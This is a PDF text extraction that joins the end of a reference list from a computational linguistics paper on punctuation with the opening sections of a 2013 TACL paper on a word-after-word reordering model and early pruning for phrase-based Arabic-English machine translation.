(ACL), pages 1– 11. Albert E. Krahn. 2014. A New Paradigm for Punctuation. Ph.D. thesis, The University of Wisconsin-Milwaukee. Tao Lei, Yu Xin, Yuan Zhang, Regina Barzilay, and Tommi Jaakkola. 2014. Low-rank tensors for scoring dependency structures. In Proceed- ings of the 52nd Annual Meeting of the As- sociation for Computational Linguistics (ACL), pages 1381–1391. 370 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00273 by Carnegie Mellon University user on 06 April 2021 https://arxiv.org/pdf/1611.01734.pdf https://doi.org/10.18653/v1/N16-1024 https://doi.org/10.18653/v1/N16-1024 http://cs.jhu.edu/~jason/papers/#eisner-1996-coling http://cs.jhu.edu/~jason/papers/#eisner-1996-coling http://cs.jhu.edu/~jason/papers/#eisner-2016 http://cs.jhu.edu/~jason/papers/#eisner-2016 http://hdl.handle.net/11234/1-1989 http://hdl.handle.net/11234/1-1989 http://hdl.handle.net/11234/1-1989 http://www.aclweb.org/anthology/N10-1115 http://www.aclweb.org/anthology/N10-1115 http://www.aclweb.org/anthology/N10-1115 http://research.microsoft.com/~joshuago/finalring.ps https://books.google.com/books?id=MnEjBsMIxxsC&lpg=PP1&pg=PA186 https://books.google.com/books?id=MnEjBsMIxxsC&lpg=PP1&pg=PA186 http://www.aclweb.org/anthology/C94-1069 http://www.aclweb.org/anthology/C94-1069 https://arxiv.org/pdf/1412.6980.pdf https://arxiv.org/pdf/1412.6980.pdf http://aclweb.org/anthology/Q16-1023 http://aclweb.org/anthology/Q16-1023 http://www.aclweb.org/anthology/C10-1068 http://www.aclweb.org/anthology/C10-1068 http://www.aclweb.org/anthology/C10-1068 http://aclweb.org/anthology/P10-1001 http://aclweb.org/anthology/P10-1001 https://dc.uwm.edu/cgi/viewcontent.cgi?article=1470&context=etd https://dc.uwm.edu/cgi/viewcontent.cgi?article=1470&context=etd http://www.aclweb.org/anthology/P14-1130 http://www.aclweb.org/anthology/P14-1130 Roger Levy. 2008. A noisy-channel model of human sentence comprehension under uncer- tain input. In Proceedings of the 2008 Con- ference on Empirical Methods in Natural Lan- guage Processing (EMNLP), pages 234–243. Xing Li, Chengqing Zong, and Rile Hu. 2005. A hierarchical parsing approach with punctuation processing for long Chinese sentences. In Pro- ceedings of the International Joint Conference on Natural Language Processing (IJCNLP). Zhifei Li and Jason Eisner. 2009. First- and second-order expectation semirings with appli- cations to minimum-risk training on translation forests. In Proceedings of the Conference on Empirical Methods in Natural Language Pro- cessing (EMNLP), pages 40–51. Wei Lu and Hwee Tou Ng. 2010. Better punctu- ation prediction with dynamic conditional ran- dom fields. In Proceedings of the 2010 Con- ference on Empirical Methods in Natural Lan- guage Processing (EMNLP), pages 177–186. Marco Lui and Li Wang. 2013. Recovering casing and punctuation using conditional ran- dom fields. In Proceedings of the Australasian Language Technology Association Workshop (ALTA), pages 137–141. Ji Ma, Yue Zhang, and Jingbo Zhu. 2014. Punc- tuation processing for projective dependency parsing. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics (Volume 2: Short Papers), pages 791–796. Gideon S. Mann and Andrew McCallum. 2010. Generalized expectation criteria for semi- supervised learning with weakly labeled data. Journal of Machine Learning Research, 11:955–984. Andrey Andreevich Markov. 1960. The theory of algorithms. American Mathematical Society Translations, series 2(15):1–14. Ilia Markov, Vivi Nastase, and Carlo Strappar- ava. 2018. Punctuation as native language in- terference. In Proceedings of the 27th Inter- national Conference on Computational Linguis- tics (COLING), pages 3456–3466. Tomas Mikolov, Kai Chen, Greg Corrado, and Jef- frey Dean. 2013. Efficient estimation of word representations in vector space. Computing Re- search Repository (CoRR), arXiv:1301.3781. Mark-Jan Nederhof and Giorgio Satta. 2003. Probabilistic parsing as intersection. In 8th In- ternational Workshop on Parsing Technologies (IWPT), pages 137–148. Hwee Tou Ng, Siew Mei Wu, Ted Briscoe, Chris- tian Hadiwinoto, Raymond Hendy Susanto, and Christopher Bryant. 2014. The CoNLL-2014 shared task on grammatical error correction. In Proceedings of the Eighteenth Conference on Computational Natural Language Learning: Shared Task, pages 1–14. Joakim Nivre, Željko Agić, Lars Ahrenberg, Maria Jesus Aranzabe, Masayuki Asahara, Aitziber Atutxa, Miguel Ballesteros, John Bauer, Kepa Bengoetxea, Yevgeni Berzak, Riyaz Ahmad Bhat, Eckhard Bick, Carl Börstell, Cristina Bosco, Gosse Bouma, Sam Bowman, Gülşen Cebiroğlu Eryiğit, Giuseppe G. A. Celano, Fabricio Chalub, Çağrı Çöl- tekin, Miriam Connor, Elizabeth Davidson, Marie-Catherine de Marneffe, Arantza Diaz de Ilarraza, Kaja Dobrovoljc, Timothy Dozat, Kira Droganova, Puneet Dwivedi, Marhaba Eli, Tomaž Erjavec, Richárd Farkas, Jennifer Foster, Claudia Freitas, Katarína Gajdošová, Daniel Galbraith, Marcos Garcia, Moa Gär- denfors, Sebastian Garza, Filip Ginter, Iakes Goenaga, Koldo Gojenola, Memduh Gökır- mak, Yoav Goldberg, Xavier Gómez Guino- vart, Berta Gonzáles Saavedra, Matias Gri- oni, Normunds Grūzı̄tis, Bruno Guillaume, Jan Hajič, Linh Hà Mỹ, Dag Haug, Barbora Hladká, Radu Ion, Elena Irimia, Anders Jo- hannsen, Fredrik Jørgensen, Hüner Kaşıkara, Hiroshi Kanayama, Jenna Kanerva, Boris Katz, Jessica Kenney, Natalia Kotsyba, Si- mon Krek, Veronika Laippala, Lucia Lam, Phuong Lê Hồng, Alessandro Lenci, Nikola Ljubešić, Olga Lyashevskaya, Teresa Lynn, Aibek Makazhanov, Christopher Manning, Cătălina Mărănduc, David Mareček, Héctor Martínez Alonso, André Martins, Jan Mašek, Yuji Matsumoto, Ryan McDonald, Anna Mis- silä, Verginica Mititelu, Yusuke Miyao, Simon- etta Montemagni, Keiko Sophie Mori, Shun- suke Mori, Bohdan Moskalevskyi, Kadri Muis- 371 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00273 by Carnegie Mellon University user on 06 April 2021 http://www.aclweb.org/anthology/D08-1025 http://www.aclweb.org/anthology/D08-1025 http://www.aclweb.org/anthology/D08-1025 http://www.aclweb.org/anthology/I05-2002 http://www.aclweb.org/anthology/I05-2002 http://www.aclweb.org/anthology/I05-2002 http://cs.jhu.edu/~jason/papers/#li-eisner-2009 http://cs.jhu.edu/~jason/papers/#li-eisner-2009 http://cs.jhu.edu/~jason/papers/#li-eisner-2009 http://cs.jhu.edu/~jason/papers/#li-eisner-2009 http://www.aclweb.org/anthology/U13-1020 http://www.aclweb.org/anthology/U13-1020 http://www.aclweb.org/anthology/U13-1020 https://doi.org/10.3115/v1/P14-2128 https://doi.org/10.3115/v1/P14-2128 https://doi.org/10.3115/v1/P14-2128 http://www.jmlr.org/papers/volume11/mann10a/mann10a.pdf http://www.jmlr.org/papers/volume11/mann10a/mann10a.pdf http://www.jmlr.org/papers/volume11/mann10a/mann10a.pdf http://www.aclweb.org/anthology/C18-1293 http://www.aclweb.org/anthology/C18-1293 http://arxiv.org/abs/1301.3781 http://arxiv.org/abs/1301.3781 https://doi.org/10.3115/v1/W14-1701 https://doi.org/10.3115/v1/W14-1701 chnek, Nina Mustafina, Kaili Müürisep, Luong Nguyễn Thi., Huyền Nguyễn Thi. Minh, Vitaly Nikolaev, Hanna Nurmi, Petya Osenova, Robert Östling, Lilja Øvrelid, Valeria Paiva, Elena Pas- cual, Marco Passarotti, Cenel-Augusto Perez, Slav Petrov, Jussi Piitulainen, Barbara Plank, Martin Popel, Lauma Pretkalnin, a, Prokopis Prokopidis, Tiina Puolakainen, Sampo Pyysalo, Alexandre Rademaker, Loganathan Ramasamy, Livy Real, Laura Rituma, Rudolf Rosa, Shadi Saleh, Baiba Saulı̄te, Sebastian Schuster, Wolf- gang Seeker, Mojgan Seraji, Lena Shakurova, Mo Shen, Natalia Silveira, Maria Simi, Radu Simionescu, Katalin Simkó, Mária Šimková, Kiril Simov, Aaron Smith, Carolyn Spadine, Alane Suhr, Umut Sulubacak, Zsolt Szántó, Takaaki Tanaka, Reut Tsarfaty, Francis Ty- ers, Sumire Uematsu, Larraitz Uria, Gertjan van Noord, Viktor Varga, Veronika Vincze, Lars Wallin, Jing Xian Wang, Jonathan North Washington, Mats Wirén, Zdeněk Žabokrt- ský, Amir Zeldes, Daniel Zeman, and Hanzhi Zhu. 2016. Universal Dependencies 1.4. LINDAT/CLARIN digital library at the In- stitute of Formal and Applied Linguistics (ÚFAL), Faculty of Mathematics and Physics, Charles University. Data available at http: //universaldependencies.org. Joakim Nivre, Johan Hall, Sandra Kübler, Ryan McDonald, Jens Nilsson, Sebastian Riedel, and Deniz Yuret. 2007a. The CoNLL 2007 shared task on dependency parsing. In Proceedings of the CoNLL Shared Task Session of EMNLP- CoNLL 2007, pages 915–932. Joakim Nivre, Johan Hall, Jens Nilsson, Atanas Chanev, Gülşen Eryigit, Sandra Kübler, Sve- toslav Marinov, and Erwin Marsi. 2007b. Malt- parser: A language-independent system for data-driven dependency parsing. Natural Lan- guage Engineering, 13(2):95–135. Joakim Nivre et al. 2018. Universal depen- dencies annotation guidelines. Available at universaldependencies.org. Geoffrey Nunberg. 1990. The Linguistics of Punc- tuation. Number 18 in CSLI Lecture Notes. Center for the Study of Language and Informa- tion. Bo Pang, Lillian Lee, and Shivakumar Vaithyanathan. 2002. Thumbs up? Senti- ment classification using machine learning techniques. In Proceedings of the 2002 Conference on Empirical Methods in Natural Language Processing (EMNLP 2002). Jeffrey Pennington, Richard Socher, and Christo- pher Manning. 2014. GloVe: Global vectors for word representation. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 1532–1543. Fernando C. N. Pereira and Michael D. Riley. 1996. Speech recognition by composition of weighted finite automata. Computing Research Repository (CoRR), arXiv:cmp-lg/9603001. Mohammad Sadegh Rasooli and Joel R. Tetreault. 2015. Yara parser: A fast and accurate depen- dency parser. Computing Research Repository, arXiv:1503.06733 (version 2). Radim Řehůřek and Petr Sojka. 2010. Software framework for topic modelling with large cor- pora. In Proceedings of the LREC 2010 Work- shop on New Challenges for NLP Frameworks, pages 45–50. Valentin I. Spitkovsky, Hiyan Alshawi, and Daniel Jurafsky. 2011. Punctuation: Making a point in unsupervised dependency parsing. In Proceed- ings of the Fifteenth Conference on Computa- tional Natural Language Learning, CoNLL ’11, pages 19–28. Kai Sheng Tai, Richard Socher, and Christo- pher D. Manning. 2015. Improved semantic representations from tree-structured long short- term memory networks. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th Interna- tional Joint Conference on Natural Language Processing (ACL-COLING), pages 1556–1566. Ottokar Tilk and Tanel Alumäe. 2016. Bidirec- tional recurrent neural network with attention mechanism for punctuation restoration. In In- terspeech, pages 3047–3051. Ke M. Tran, Yonatan Bisk, Ashish Vaswani, Daniel Marcu, and Kevin Knight. 2016. Unsu- pervised neural hidden Markov models. In Pro- ceedings of the Workshop on Structured Predic- tion for NLP, pages 63–71. 372 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00273 by Carnegie Mellon University user on 06 April 2021 http://hdl.handle.net/11234/1-1827 http://universaldependencies.org http://universaldependencies.org http://www.aclweb.org/anthology/D/D07/D07-1096 http://www.aclweb.org/anthology/D/D07/D07-1096 http://universaldependencies.org/guidelines.html http://universaldependencies.org/guidelines.html universaldependencies.org http://www.aclweb.org/anthology/W02-1011 http://www.aclweb.org/anthology/W02-1011 http://www.aclweb.org/anthology/W02-1011 https://doi.org/10.3115/v1/D14-1162 https://doi.org/10.3115/v1/D14-1162 https://arxiv.org/abs/cmp-lg/9603001 https://arxiv.org/abs/cmp-lg/9603001 http://arxiv.org/abs/1503.06733 http://arxiv.org/abs/1503.06733 http://is.muni.cz/publication/884893/en http://is.muni.cz/publication/884893/en http://is.muni.cz/publication/884893/en http://dl.acm.org/citation.cfm?id=2018936.2018939 http://dl.acm.org/citation.cfm?id=2018936.2018939 https://doi.org/10.3115/v1/P15-1150 https://doi.org/10.3115/v1/P15-1150 https://doi.org/10.3115/v1/P15-1150 https://doi.org/10.18653/v1/W16-5907 https://doi.org/10.18653/v1/W16-5907 University of Chicago. 2010. The Chicago Man- ual of Style. University of Chicago Press. Dingquan Wang and Jason Eisner. 2016. The Galactic Dependencies treebanks: Getting more data by synthesizing new languages. Transac- tions of the Association for Computational Lin- guistics (TACL), 4:491–505. Michael White and Rajakrishnan Rajkumar. 2008. A more precise analysis of punctuation for broad-coverage surface realization with CCG. In Proceedings of the COLING 2008 Workshop on Grammar Engineering Across Frameworks, pages 17–24. K. Xu, L. Xie, and K. Yao. 2016. Investigat- ing LSTM for punctuation prediction. In 2016 10th International Symposium on Chinese Spo- ken Language Processing (ISCSLP), pages 1–5. Richard Zens, Franz Josef Och, and Hermann Ney. 2002. Phrase-based statistical machine transla- tion. In Annual Conference on Artificial Intelli- gence, pages 18–32. Dongdong Zhang, Shuangzhi Wu, Nan Yang, and Mu Li. 2013. Punctuation prediction with transition-based parsing. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics (ACL), pages 752– 760. Yue Zhang and Joakim Nivre. 2011. Transition- based dependency parsing with rich non-local features. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics: Human Language Technologies (NAACL-HLT), pages 188–193. 373 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00273 by Carnegie Mellon University user on 06 April 2021 http://cs.jhu.edu/~jason/papers/#wang-eisner-2016 http://cs.jhu.edu/~jason/papers/#wang-eisner-2016 http://cs.jhu.edu/~jason/papers/#wang-eisner-2016 http://www.aclweb.org/anthology/W08-1703 http://www.aclweb.org/anthology/W08-1703 https://doi.org/10.1109/ISCSLP.2016.7918492 https://doi.org/10.1109/ISCSLP.2016.7918492 https://link.springer.com/chapter/10.1007/3-540-45751-8_2 https://link.springer.com/chapter/10.1007/3-540-45751-8_2 http://www.aclweb.org/anthology/P13-1074 http://www.aclweb.org/anthology/P13-1074 http://www.aclweb.org/anthology/P11-2033 http://www.aclweb.org/anthology/P11-2033 http://www.aclweb.org/anthology/P11-2033 work_v44vkh6bzramngvcrficy2no44 ---- Dynamically Shaping the Reordering Search Space of Phrase-Based Statistical Machine Translation Arianna Bisazza and Marcello Federico Fondazione Bruno Kessler Trento, Italy {bisazza,federico}@fbk.eu Abstract Defining the reordering search space is a cru- cial issue in phrase-based SMT between dis- tant languages. In fact, the optimal trade- off between accuracy and complexity of de- coding is nowadays reached by harshly lim- iting the input permutation space. We pro- pose a method to dynamically shape such space and, thus, capture long-range word movements without hurting translation qual- ity nor decoding time. The space defined by loose reordering constraints is dynamically pruned through a binary classifier that predicts whether a given input word should be trans- lated right after another. The integration of this model into a phrase-based decoder im- proves a strong Arabic-English baseline al- ready including state-of-the-art early distor- tion cost (Moore and Quirk, 2007) and hierar- chical phrase orientation models (Galley and Manning, 2008). Significant improvements in the reordering of verbs are achieved by a sys- tem that is notably faster than the baseline, while BLEU and METEOR remain stable, or even increase, at a very high distortion limit. 1 Introduction Word order differences are among the most impor- tant factors determining the performance of statisti- cal machine translation (SMT) on a given language pair (Birch et al., 2009). This is particularly true in the framework of phrase-based SMT (PSMT) (Zens et al., 2002; Koehn et al., 2003; Och and Ney, 2002), an approach that remains highly competitive despite the recent advances of the tree-based approaches. During the PSMT decoding process, the output sentence is built from left to right, while the input sentence positions can be covered in different or- ders. Thus, reordering in PSMT can be viewed as the problem of choosing the input permutation that leads to the highest-scoring output sentence. Due to efficiency reasons, however, the input permutation space cannot be fully explored, and is therefore lim- ited with hard reordering constraints. Although many solutions have been proposed to explicitly model word reordering during decoding, PSMT still largely fails to handle long-range word movements in language pairs with different syntac- tic structures1. We believe this is mostly not due to deficiencies of the existing reordering models, but rather to a very coarse definition of the reorder- ing search space. Indeed, the existing reordering constraints are rather simple and typically based on word-to-word distances. Moreover, they are uni- form throughout the input sentence and insensitive to the actual words being translated. Relaxing this kind of constraints means dramatically increasing the size of the search space and making the reorder- ing model’s task extremely complex. As a result, even in language pairs where long reordering is reg- ularly observed, PSMT quality degrades when long word movements are allowed to the decoder. We address this problem by training a binary classifier to predict whether a given input position should be translated right after another, given the words at those positions and their contexts. When this model is integrated into the decoder, its predic- 1For empirical evidence, see for instance (Birch et al., 2009; Galley and Manning, 2008; Bisazza and Federico, 2012). 327 Transactions of the Association for Computational Linguistics, 1 (2013) 327–340. Action Editor: Philipp Koehn. Submitted 1/2013; Revised 5/2013; Published 7/2013. c©2013 Association for Computational Linguistics. tions can be used not only as an additional feature function, but also as an early indication of whether or not a given reordering path should be further ex- plored. More specifically, at each hypothesis ex- pansion, we consider the set of input positions that are reachable according to the usual reordering con- straints, and prune it based only on the reorder- ing model score. Then, the hypothesis can be ex- panded normally by covering the non-pruned posi- tions. This technique makes it possible to dynami- cally shape the search space while decoding with a very high distortion limit, which can improve trans- lation quality and efficiency at the same time. The remainder of the paper is organized as fol- lows. After an overview of the relevant literature, we describe in detail our word reordering model. In the following section, we introduce early pruning of reordering steps as a way to dynamically shape the input permutation space. Finally, we present an em- pirical analysis of our approach, including intrinsic evaluation of the model and SMT experiments on a well-known Arabic-English news translation task. 2 Previous Work In this paper, we focus on methods that guide the reordering search during the phrase-based decoding process. See for instance (Costa-jussà and Fonol- losa, 2009) for a review of pre- and post-reordering approaches that are not treated here. Assuming a one-to-one correspondence between source and target phrases, reordering in PSMT can be viewed as the problem of searching through a set of permutations of the input sentence. Thus, two sub-problems arise: defining the set of allowed per- mutations (reordering constraints) and scoring the allowed permutations according to some likelihood criterion (reordering model). We begin with the lat- ter, returning to the constraints later in this section. 2.1 Reordering modeling In its original formulation, the PSMT approach includes a basic reordering model, called distor- tion cost, that exponentially penalizes longer jumps among consecutively translated phrases (f̃i!1, f̃i): d(f̃i!1, f̃i) = e !|start(f̃i) ! end(f̃i!1) ! 1| A number of more sophisticated solutions have been proposed to explicitly model word reorder- ing during decoding. These can mostly be grouped into three families: phrase orientation models, jump models and source decoding sequence models. Phrase orientation models (Tillmann, 2004; Koehn et al., 2005; Zens and Ney, 2006; Galley and Manning, 2008), also known as lexicalized reorder- ing models, predict the orientation of a phrase with respect to the last translated one, by classifying it as monotone, swap or discontinuous. These mod- els have proven very useful for short and medium- range reordering and are among the most widely used in PSMT. However, their coarse classification of reordering steps makes them unsuitable to predict long-range reorderings. Jump models (Al-Onaizan and Papineni, 2006; Green et al., 2010; Yahyaei and Monz, 2010) predict the direction and length of a jump to perform after a given input word2. Both these works achieve their best Arabic-English results within a rather small DL: namely, 8 in (Al-Onaizan and Papineni, 2006) and 5 in (Green et al., 2010), thus failing to capture the rare but crucial long reorderings that were their main motivation. A drawback of this approach is that long jumps are typically penalized because of their low frequency compared to short jumps. This strong bias is undesirable, given that we are especially in- terested in detecting probable long reorderings. Source decoding sequence models predict which input word is likely to be translated at a given state of decoding. For instance, reordered source lan- guage models (Feng et al., 2010) are smoothed n- gram models trained on a corpus of source sentences reordered to match the target word order. When inte- grated into the SMT system, they assign a probabil- ity to each newly translated word given the n-1 pre- viously translated words. Finally, source word pair reordering models (Visweswariah et al., 2011) esti- mate, for each pair of input words i and j, the cost of translating j right after i given various features of i, j and their respective contexts. Differently from reordered source LMs, these models are discrimina- tive and can profit from richer feature sets. At the same time, they do not employ decoding history- based features, which allows for more effective hy- 2In this paper, input (or source) word denotes the word at a given position of the input sentence, rather than a word type. 328 pothesis recombination. The model we are going to present belongs to this last sub-group, which we find especially suitable to predict long reorderings. 2.2 Reordering constraints The reordering constraint originally included in the PSMT framework and implemented in our reference toolkit, Moses (Koehn et al., 2007), is called dis- tortion limit (DL). This consists in allowing the de- coder to skip, or jump, at most k words from the last translated phrase to the next one. More precisely, the limit is imposed on the distortion D between consec- utively translated phrases (f̃i!1, f̃i): D(f̃i!1, f̃i) = !!!start(f̃i) ! end(f̃i!1) ! 1 !!! " DL Limiting the input permutation space is necessary for beam-search PSMT decoders to function in lin- ear time. Reordering constraints are also important for translation quality because the existing models are typically not discriminative enough to guide the search over very large sets of reordering hypotheses. Despite their crucial effects on the complexity of reordering modeling, though, reordering constraints have drawn less attention in the literature. The ex- isting reordering constraints are typically based on word-to-word distances – IBM (Berger et al., 1996) and DL (Koehn et al., 2007) – or on permutation pat- terns – ITG (Wu, 1997). Both kinds of constraints are uniform throughout the input sentence, and in- sensitive to the word being translated and to its con- text. This results in a very coarse definition of the reordering search space, which is problematic in lan- guage pairs with different syntactic structures. To address this problem, Yahyaei and Monz (2010) present a technique to dynamically set the DL: they train a classifier to predict the most prob- able jump length after each input word, and use the predicted value as the DL after that position. Un- fortunately, this method can generate inconsistent constraints leading to decoding dead-ends. As a so- lution, the dynamic DL is relaxed when needed to reach the first uncovered position. Translation im- provements are reported only on a small-scale task with short sentences (BTEC), over a baseline that in- cludes a very simple reordering model. In our work we develop this idea further and use a reordering model to predict which specific input words, rather than input intervals, are likely be translated next. Moreover, our solution is not affected by the con- straint inconsistency problem (see Sect. 4). In another related work, Bisazza and Federico (2012) generate likely reorderings of the input sen- tence by means of language-specific fuzzy rules based on shallow syntax. Long jumps are then sug- gested to the PSMT decoder by reducing the distor- tion cost for specific pairs of input words. In com- parison to the dynamic DL, that is a much finer way to define the reordering space, leading to consistent improvements of both translation quality and effi- ciency over a strong baseline. However, the need of specific reordering rules makes the method harder to apply to new language pairs. 3 The WaW reordering model We model reordering as the problem of deciding whether a given input word should be translated after another (Word-after-Word). This formulation is particularly suitable to help the decoder decide whether a reordering path is promising enough to be further explored. Moreover, when translating a sentence, choosing the next source word to translate appears as a more natural problem than guessing how much to the left or to the right we should move from the current source position. The WaW reordering model addresses a binary decision task through the following maximum-entropy classifier: P (Ri,j =Y |f J1 , i, j) = exp[ " m !mhm(f J 1 , i, j, Ri,j =Y )]" Y ! exp[ " m !mhm(f J 1 , i, j, Ri,j =Y ")] where f J1 is a source sentence of J words, hm are feature functions and !m the corresponding feature weights. The outcome Y can be either 1 or 0, with Ri,j =1 meaning that the word at position j is trans- lated right after the word at position i. Our WaW reordering model is strongly related to that of Visweswariah et al. (2011) – hereby called Travelling Salesman Problem (TSP) model – with few important differences: (i) we do not include in the features any explicit indication of the jump length, in order to avoid the bias on short jumps; (ii) they train a linear model with MIRA (Cram- mer and Singer, 2003) by minimizing the number 329 of input words that get placed after the wrong po- sition, while we use a maximum-entropy classifier trained by maximum-likelihood; (iii) they use an off-the shelf TSP solver to find the best source sen- tence permutation and apply it as pre-processing to training and test data. By contrast, we integrate the maximum-entropy classifier directly into the SMT decoder and let all its other models (phrase orien- tation, translation, target LM etc.) contribute to the final reordering decision. 3.1 Features Like the TSP model (Visweswariah et al., 2011), the WaW model builds on binary features similar to those typically employed for dependency parsing (McDonald et al., 2005): namely, combinations of surface forms or POS tags of the words i and j and their context. Our feature templates are presented in Table 1. The main novelties with respect to the TSP model are the mixed word-POS templates (rows 16- 17) and the shallow syntax features. In particular, we use the chunk types of i, j and their context (18-19), as well as the chunk head words of i and j (20). Fi- nally we add a feature to indicate whether the words i and j belong to the same chunk (21). The jump orientation – forward/backward – is included in the features that represent the words comprised between i and j (rows 6, 7, 14, 15). No explicit indication of the jump length is included in any feature. 3.2 Training data To generate training data for the classifier, we first extract reference reorderings from a word-aligned parallel corpus. Given a parallel sentence, differ- ent heuristics may be used to convert arbitrary word alignments to a source permutation (Birch et al., 2010; Feng et al., 2010; Visweswariah et al., 2011). Similarly to this last work, we compute for each source word fi the mean ai of the target positions aligned to fi, then sort the source words according to this value.3 As a difference, though, we do not discard unaligned words but assign them the mean 3Using the mean of the aligned indices makes the gener- ation of reference permutations more robust to alignment er- rors. Admittedly, this heuristic does not handle well the case of source words that are correctly aligned to non-consecutive tar- get words. However, this phenomenon is also not captured by standard PSMT models, who only learn continuous phrases. i!2 i!1 i i+1 b j!1 j j+1 1 w w 2 w w w 3 w w w w 4 w w w w 5 w w w w 6 w w w 7 wall w w 8 p p 9 p p p 10 p p p p 11 p p p p 12 p p p p 13 p p p p p p 14 p p p 15 pall p p 16 w p 17 p w 18 c c 19 c c c c c c 20 h h 21 belong to same chunk(i, j)? w: word identity, p: POS tag, c: chunk type, h: chunk head Table 1: Feature templates used to learn whether a source position j is to be translated right after i. Positions com- prised between i and j are denoted by b and generate two feature templates: one for each position (6 and 14) and one for the concatentation of them all (7 and 15). of their neighbouring words’ alignment means, so that a complete permutation of the source sentence (") is obtained. Table 2(a) illustrates this procedure. Given the reference permutation, we then gener- ate positive and negative training samples by simu- lating the decoding process. We traverse the source positions in the order defined by ", keeping track of the positions that have already been covered and, for each t : 1 " t " J , generate: • one positive sample (R!t,!t+1 =1) for the source position that comes right after it, • a negative sample (R!t,u=0) for each source position in {u : "t!#+1 < u < "t+#+1 # u $= "t+1} that has not yet been translated. Here, the sampling window # serves to control the size of the training data and the proportion between positive and negative samples. Its value naturally correlates with the DL used in decoding. The gener- ation of training samples is illustrated by Table 2(b). 330 (a) Converting word alignments to a permutation: source words are sorted by their target alignments mean a. The unaligned word “D” is assigned the mean of its neighbouring words’ a values (2 + 5)/2 = 3.5 : (b) Generating binary samples by simulating the decoding process: shaded rounds represent cov- ered positions, while dashed arrows represent negative samples: Table 2: The classifier’s training data generation process. 3.3 Integration into phrase-based decoding Rather than using the new reordering model for data pre-processing as done by (Visweswariah et al., 2011), we directly integrate it into the PSMT de- coder Moses (Koehn et al., 2007). Two main computation phases are required by the WaW model: (i) at system initialization time, all fea- ture weights are loaded into memory, and (ii) before translating each new sentence, features are extracted from it and model probabilities are pre-computed for each pair of source positions (i, j) such that |j ! i ! 1| " DL. Note that this efficient solution is possible because our model does not employ de- coding history-based features, like the word that was translated before the last one, or like the previous jump legth. This is an important difference with re- spect to the reordered source LM proposed by Feng et al. (2010), which requires inclusion of the last n translated words in the decoder state. Fig. 1 illustrates the scoring process: when a par- tial translation hypothesis H is expanded by cover- ing a new source phrase f̃ , the model returns the log-probability of translating the words of f̃ in that particular order, just after the last translated word of H. In details, this is done by converting the phrase- internal word alignment4 to a source permutation, in just the same way it was done to produce the model’s training examples. Thus, the global score is inde- pendent from phrase segmentation, and normalized across outputs of different lengths: that is, the proba- bility of any complete hypothesis decomposes into J factors, where J is the length of the input sentence. The WaW reordering model is fully compatible with, and complementary to the lexicalized reorder- ing (phrase orientation) models included in Moses. Figure 1: Integrating the binary word reordering model into a phrase-based decoder: when a new phrase is covered (dashed boxes), the model returns the log- probability of translating its words in the order defined by the phrase-internal word alignment. 4 Early pruning of reordering steps We now explain how the WaW reordering model can be used to dynamically refine the input permutation space. This method is not dependent on the particu- lar classifier described in this paper, but can in prin- ciple work with any device estimating the probabil- ity of translating a given input word after another. The method consists of querying the reordering model at the time of hypothesis expansion, and fil- tering out hypotheses solely based on their reorder- ing score. The rationale is to avoid costly hypoth- esis expansions for those source positions that the reordering model considers very unlikely to be cov- ered at a given point of decoding. In practice, this works as follows: • at each hypothesis expansion, we first enumer- ate the set of uncovered input positions that are reachable within a fixed DL, and query the WaW reordering model for each of them5; 4Phrase-internal alignments are provided in the phrase table. 5The score used to prune a new word range f̃ is the log prob- ability of translating the first aligned word of f̃ right after the last translated word of the current hypothesis. See also Sect. 3.3. 331 • only based on the WaW score, we apply his- togram and threshold pruning to this set and proceed to expand the non-pruned positions. Furthermore, it is possible to ensure that local re- orderings are always allowed, by setting a so-called non-prunable-zone of width $ around the last cov- ered input position.6 According to how the DL, pruning parameters, and $ are set, we can actually aim at different tar- gets: with a low DL, loose pruning parameters, and $=0 we can try to speed up search without sacrific- ing much translation quality. With a high DL, strict pruning parameters, and a medium $, we ensure that the standard medium-range reordering space is ex- plored, as well as those few long jumps that are promising according to the reordering model. In our experiments, we explore this second option with the setting DL=18 and $=5. The underlying idea is similar to that of early pruning proposed by Moore and Quirk (2007), which consisted in discarding possible extensions of a partial hypothesis based on their estimated score before computing the exact language model score. Our technique too has the effect of introducing ad- ditional points at which the search space is pruned. However, while theirs was mainly an optimization technique meant to avoid useless LM queries, we in- stead aim at refining the search space by exploiting the fact that some SMT models are more important than others at different stages of the translation pro- cess. Our approach actually involves a continuous alternation of two processes: during hypothesis ex- pansion the reordering score is combined with all other scores, while during early pruning some re- ordering decisions are taken only based on the re- ordering score. In this way, we try to combine the benefits of fully integrated reordering models with those of monolingual pre-ordering methods. 5 Evaluation We test our approach on an Arabic-English news translation task where sentences are typically long and complex. In this language pair, long reorder- ing errors mostly concern verbs, as all of Subject- Verb-Object (SVO), VSO and, more rarerly, VOS 6See Bisazza (2013) for technical details on the integration of word-level pruning with phrase-level hypothesis expansion. constructions are attested in modern written Ara- bic. This issue is well known in the SMT field and was addressed by several recent works, with deep or shallow parsing-based techniques (Green et al., 2009; Carpuat et al., 2012; Andreas et al., 2011; Bisazza et al., 2012). We question whether our ap- proach – which is not conceived to solve this spe- cific problem, nor requires manual rules to predict verb reordering – will succeed in improving long re- ordering in a fully data-driven way. As SMT training data, we use all the in-domain parallel data provided for the NIST-MT09 evalua- tion for a total of 986K sentence pairs (31M English words).7 The target LM used to run the main se- ries of experiments is trained on the English side of all available NIST-MT09 parallel data, UN included (147M words). In the large-scale experiments, the LM training data also include the sections of the En- glish Gigaword that best fit to the development data in terms of perplexity: namely, the Agence France- Presse, Xinhua News Agency and Associated Press Worldstream sections (2130M words in total). For development and test, we use the newswire sections of the NIST benchmarks: dev06-nw, eval08- nw, eval09-nw consisting of 1033, 813, 586 sen- tences respectively. Each set includes 4 reference translations and the average sentence length is 33 words. To focus the evaluation on problematic re- ordering, we also consider a subset of eval09-nw containing only sentences where the Arabic main verb is placed before the subject (vs-09: 299 sent.).8 As pre-processing, we apply standard tokeniza- tion to the English data, while the Arabic data is segmented with AMIRA (Diab et al., 2004) accord- ing to the ATB scheme9. The same tool also pro- duces POS tagging and shallow syntax annotation. 